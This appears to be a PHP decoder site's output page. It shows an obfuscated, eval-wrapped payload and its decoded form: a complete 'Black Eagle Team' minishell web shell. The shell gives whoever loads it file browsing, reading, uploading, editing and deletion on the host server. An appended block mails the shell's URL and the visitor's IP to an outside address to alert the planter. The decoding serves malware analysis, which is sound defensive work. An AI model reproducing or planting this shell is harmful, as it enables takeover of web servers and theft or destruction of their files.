Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$arif = "=wb+JvwdMZRM/UfOfx3IuBJOw0wJj7OJMQsLQ/+ouwny9xLDtTOE4mfGzXC6AFHqScMOc5aLJDUDKRP9k..
Decoded Output download
?>b'<?php
/*
Black Eagle Team Shell v2
By : Bo0G3yM4n
Thanks To : Black Eagle Team, Dark Clown Security
Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v
Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell
*/
set_time_limit(0);
error_reporting(0);
error_log(0);
$sname = "Black Eagle Team" . " Minishell";
$__gcdir = "g" . "etcwd";
$__fgetcon7s = "file" . "_get_contents";
$__scdir = "s" . "candi" . "r";
$rm__dir = "rmd" . "ir";
$un__link = "un" . "link";
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo \'<!DOCTYPE html>
<html>
<head>
<meta name="robots" content"noindex. nofollow">
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">
<title>\'.$sname.\'</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">
</head>
<body>\';
echo \'<div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>\' . $sname . \'</center></h1></div>\';
if (isset($_GET[\'path\'])) {
$path = $_GET[\'path\'];
chdir($_GET[\'path\']);
} else {
$path = $__gcdir();
}
$path = str_replace("\", "/", $path);
$paths = explode("/", $path);
echo \'<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';
echo "<font style=\'font-size:13px;\'>Path: ";
foreach ($paths as $id => $pat) {
echo "<a style=\'font-size:13px;\' href=\'?path=";
for ($i = 0; $i <= $id; $i++) {
echo $paths[$i];
if ($i != $id) {
echo "/";
}
}
echo "\'>$pat</a>/";
}
echo \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';
if (isset($_FILES[\'file\'])) {
if (copy($_FILES[\'file\'][\'tmp_name\'], $path . \'/\' . $_FILES[\'file\'][\'name\'])) {
echo \'<center><font color="#00ff00">Upload Berhasil!!</font></center><br/>\';
} else {
echo \'<center><font color="red">Upload Gagal!!</font></center><br/>\';
}
}
echo \'</td></tr><tr><td></table><div class="table-div"></div><input id="image" type="hidden">\';
echo \'\';
if (isset($_GET[\'filesrc\'])) {
echo \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';
echo "" . basename($_GET[\'filesrc\']);
"";
echo \'</tr></td></table><br />\';
echo ("<center><textarea readonly=\'\'>" . htmlspecialchars($__fgetcon7s($_GET[\'filesrc\'])) . "</textarea></center>");
} elseif (isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\') {
echo \'</table><br /><center>\' . $_POST[\'path\'] . \'<br /><br />\';
if ($_POST[\'opt\'] == \'rename\') {
if (isset($_POST[\'newname\'])) {
if (rename($_POST[\'path\'], $path . \'/\' . $_POST[\'newname\'])) {
echo \'<center><font color="#00ff00">Rename OK!</font></center><br />\';
} else {
echo \'<center><font color="red">Rename Failed!</font></center><br />\';
}
$_POST[\'name\'] = $_POST[\'newname\'];
}
echo \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\' . $_POST[\'name\'] . \'" /> <input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Save" /></form>\';
} elseif ($_POST[\'opt\'] == \'edit\') {
if (isset($_POST[\'src\'])) {
$fp = fopen($_POST[\'path\'], \'w\');
if (fwrite($fp, $_POST[\'src\'])) {
echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';
} else {
echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';
}
fclose($fp);
}
echo \'<form method="POST"><textarea cols=80 rows=20 name="src">\' . htmlspecialchars($__fgetcon7s($_POST[\'path\'])) . \'</textarea><br /><input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Save" /></form>\';
}
echo \'</center>\';
} else {
echo \'</table><br /><center>\';
if (isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\') {
if ($_POST[\'type\'] == \'dir\') {
if ($rm__dir($_POST[\'path\'])) {
echo \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';
} else {
echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';
}
} elseif ($_POST[\'type\'] == \'file\') {
if ($un__link($_POST[\'path\'])) {
echo \'<font color="#00ff00">Delete File Done.</font><br />\';
} else {
echo \'<font color="red">Delete File Error.</font><br />\';
}
}
}
echo \'</center>\';
$_scdir = $__scdir($path);
echo \'<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>\';
foreach ($_scdir as $dir) {
if (!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\')
continue;
echo "<tr><td>[D] <a href=\"?path=$path/$dir\">$dir</a></td><td><center>--</center></td><td><center>";
if (is_writable("$path/$dir"))
echo \'<font color="#00ff00">\';
elseif (!is_readable("$path/$dir"))
echo \'<font color="red">\';
echo perms("$path/$dir");
if (is_writable("$path/$dir") || !is_readable("$path/$dir"))
echo \'</font>\';
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";
echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"$dir\"><input type=\"hidden\" name=\"path\" value=\"$path/$dir\"> <input type=\"submit\" value=\">>\" /></form></center></td></tr>";
}
foreach ($_scdir as $file) {
if (!is_file("$path/$file"))
continue;
$size = filesize("$path/$file") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . \' MB\';
} else {
$size = $size . \' KB\';
}
echo "<tr><td>[F] <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td><td><center>" . $size . "</center></td><td><center>";
if (is_writable("$path/$file"))
echo \'<font color="#00ff00">\';
elseif (!is_readable("$path/$file"))
echo \'<font color="red">\';
echo perms("$path/$file");
if (is_writable("$path/$file") || !is_readable("$path/$file"))
echo \'</font>\';
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";
echo "</center></td><td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"$file\"><input type=\"hidden\" name=\"path\" value=\"$path/$file\"> <input type=\"submit\" value=\">>\" /></form></center></td></tr>";
}
echo \'</table></div>\';
}
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
$info = \'s\';
} elseif (($perms & 0xA000) == 0xA000) {
$info = \'l\';
} elseif (($perms & 0x8000) == 0x8000) {
$info = \'-\';
} elseif (($perms & 0x6000) == 0x6000) {
$info = \'b\';
} elseif (($perms & 0x4000) == 0x4000) {
$info = \'d\';
} elseif (($perms & 0x2000) == 0x2000) {
$info = \'c\';
} elseif (($perms & 0x1000) == 0x1000) {
$info = \'p\';
} else {
$info = \'u\';
}
$info .= (($perms & 0x0100) ? \'r\' : \'-\');
$info .= (($perms & 0x0080) ? \'w\' : \'-\');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\') : (($perms & 0x0800) ? \'S\' : \'-\'));
$info .= (($perms & 0x0020) ? \'r\' : \'-\');
$info .= (($perms & 0x0010) ? \'w\' : \'-\');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\') : (($perms & 0x0400) ? \'S\' : \'-\'));
$info .= (($perms & 0x0004) ? \'r\' : \'-\');
$info .= (($perms & 0x0002) ? \'w\' : \'-\');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\') : (($perms & 0x0200) ? \'T\' : \'-\'));
return $info;
}
echo \'<br><center>© <span id="footer"></span> 2020 Black Eagle Team</center><br>\';
echo \'</body></html><!-- EOF -->\';
?>
<?php
@ini_set(\'output_buffering\', 0);
@ini_set(\'display_errors\', 0);
set_time_limit(0);
ini_set(\'memory_limit\', \'64M\');
header(\'Content-Type: text/html; charset=UTF-8\');
$to = \'[email protected]\';
$f31337 = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];
$fie = "Akses $f31337 :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";
mail($to, "Papa Yui Chan Dapet Shell Nih : )", $fie, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");
?>'Did this file decode correctly?
Original Code
$arif = "=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";
eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));Function Calls
| strrev | 1 |
| gzinflate | 3 |
| gzuncompress | 2 |
| base64_decode | 1 |
Stats
| MD5 | dbeb17492fe47067126659bbf4cf0bbe |
| Eval Count | 1 |
| Decode Time | 92 ms |